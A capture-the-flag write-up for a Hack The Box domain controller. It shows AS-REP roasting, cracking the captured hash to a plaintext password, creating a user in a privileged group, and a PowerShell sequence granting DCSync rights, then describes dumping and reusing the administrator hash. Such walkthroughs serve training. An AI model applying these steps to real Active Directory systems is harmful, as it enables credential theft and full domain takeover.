System Information
Initial Enumeration
It is a windows machine so we start using enum4linux
Domain name: HTB
Users:
- andy (Andy hislip)
- lucinda (Lucinda Berger)
- sebastien (Sebastien Caron)
- mark (Mark Brandt)
- santi (Santi Rodriguez)
- ezra
- Svc-alfresco
After some checks we can discover that svc-alfresco doesn't require Kerberos pre-authentication and therefore we can use a script from Impacket named GetNPUsers.py.
This scripts returns a TGT for the user even without knowing the password
# ./GetNPUsers.py -request
-no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
Impacket v0.9.20 - Copyright 2019
SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d935a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d
# john --wordlist=../../rockyou.txt
hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep,
Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES
256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any
other key for status
0g 0:00:00:11 24.38% (ETA: 03:58:12) 0g/s
334503p/s 334503c/s 334503C/s smf1180..smf,727
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:12 DONE (2019-11-04 03:57)
0.08176g/s 334072p/s 334072c/s 334072C/s s3s1k2..s3rj12
Use the "--show" option to
display all of the cracked passwords reliably
Session completed
# john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB:s3rvice
1 password hash cracked, 0 left
We can discover shares using this account:
smbclient -L 10.10.10.161 -U
"htb/svc-alfresco"
Enter HTB\svc-alfresco's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup
listing.
do_connect: Connection to 10.10.10.161
failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no
workgroup available
Initial Foothold & User Flag
We can use WinRM to get access as svc-alfresco:
We can navigate to desktop and get the user flag:
Root Flag
Doing further enumeration we can discover that svc-alfresco user can add new user and also add them to some groups, like "Exchange Windows Permissions"
So I created and added a standard user.
net user nik Nik-1234
/add
net group "Exchange
Windows Permissions" nik /ADD /DOMAIN
net localgroup
"Remote Management Users" nik /ADD
Once logged as the new user with WinRM I used Sharphound to get all the information regarding Active directory and found a possible path to domain admins:
It seems that there is a path
from my user to HTB.local domain using the permission Exchange Windows
Permissions
This is explained in:
I used a command sequence:
$acl = get-acl "ad:DC=htb,DC=local"
$id =
[Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser
-Identity $id.User
$sid = new-object
System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the
extended right Ds-Replication-Get-Changes-All
$objectguid = new-object
Guid
1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity =
[System.Security.Principal.IdentityReference] $sid
$adRights =
[System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type =
[System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType =
[System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object
System.DirectoryServices.ActiveDirectoryAccessRule
$identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Now the user nik has extended rights on the AD domain named Ds-Replication-Get-Changes-All (this means that this user can be used to replicate AD information, which also means that it has the rights to read all information from the AD domain)
Then we can go back to impacket and used secretsdump to dump
all hashes and tickets:
We don't need to crack any hash, we just can reuse the administrator hash with the wmiexec.py tool of impacket and get a shell:
And also the root flag